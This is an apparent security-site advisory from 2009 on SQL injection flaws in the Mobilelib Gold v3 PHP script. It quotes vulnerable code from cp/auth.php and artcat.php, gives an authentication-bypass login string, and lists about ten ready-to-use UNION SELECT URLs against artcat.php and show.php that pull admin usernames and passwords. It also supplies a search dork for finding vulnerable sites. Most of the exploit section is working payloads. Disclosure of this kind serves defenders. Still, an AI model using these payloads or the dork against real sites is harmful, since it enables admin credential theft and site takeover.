Mobilelib Gold v3 (Auth Bypass/SQL) Multiple Remote Vulnerabilities

2009-08-18 / 2009-08-19
Credit: SwEET-DeViL
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#---------------------------------------------------------------------------------------------------------------- Script : Mobilelib Gold version : 3.0 Language: PHP Site: http://www.ac4p.com Dork: intext:Powered by Mobilelib Gold v3 Found by: SwEET-DeViL need magic_quotes_gpc = Off #---------------------------------------------------------------------------------------------------------------- )=> cp/auth.php || Auth Bypass SQL Injection Vulnerability ................................................................................................................. $adminName=$_POST['adminName']; $adminName=strip_tags($adminName); $Xadminpass=strip_tags($Xadminpass); $adminlogin=@mysql_query("SELECT * FROM mobilelib_admin WHERE adminn='$adminName' AND adminpass='$Xadminpass'"); ................................................................................................................. #Exploit: username : 'or 1=1/* )=> artcat.php || Remote SQL Injection Vulnerability ................................................................................................................. if($_GET['cid']) { $cid = intval( $_GET['cid'] ); $cid = preg_replace("/'\/<>\"/","",$_GET['cid']); //X ................................................................................................................. #Exploit: http://WWW.Site.Com/goldv3/artcat.php?cid=-1'+union+select+adminpass,2,adminn,4,5+from+mobilelib_admin/* ----------------------------------------------------------------------------------------------------------------- ................................................................................................................. )=> show.php || Remote SQL Injection Vulnerability #Exploit: http://WWW.Site.Com/goldv3/show.php?cat=games&catid=-1'+union+select+1,2,adminpass,4,5,adminn,7,8+from+mobilelib_admin/* http://WWW.Site.Com/goldv3/show.php?cat=pro&catid=-1'+union+select+1,2,adminn,adminpass,5,6,7,8,9+from+mobilelib_admin/* http://WWW.Site.Com/goldv3/show.php?cat=themes&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin/* http://WWW.Site.Com/goldv3/show.php?cat=wallpapers&catid=-1'+union+select+1,2,3,4,adminn,adminpass,7+from+mobilelib_admin/* http://WWW.Site.Com/goldv3/show.php?cat=blue&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/* http://WWW.Site.Com/goldv3/show.php?cat=mms&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/* http://WWW.Site.Com/goldv3/show.php?cat=sound&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9+from+mobilelib_admin/* http://WWW.Site.Com/goldv3/show.php?cat=vido&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8,9,10+from+mobilelib_admin/* http://WWW.Site.Com/goldv3/show.php?cat=msgs&catid=-1'+union+select+1,2,adminpass,4,5,6,7,8+from+mobilelib_admin/* -----------------------------------------------------------------------------------------------------------------

References:

http://www.securityfocus.com/bid/35910
http://www.milw0rm.com/exploits/9327


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top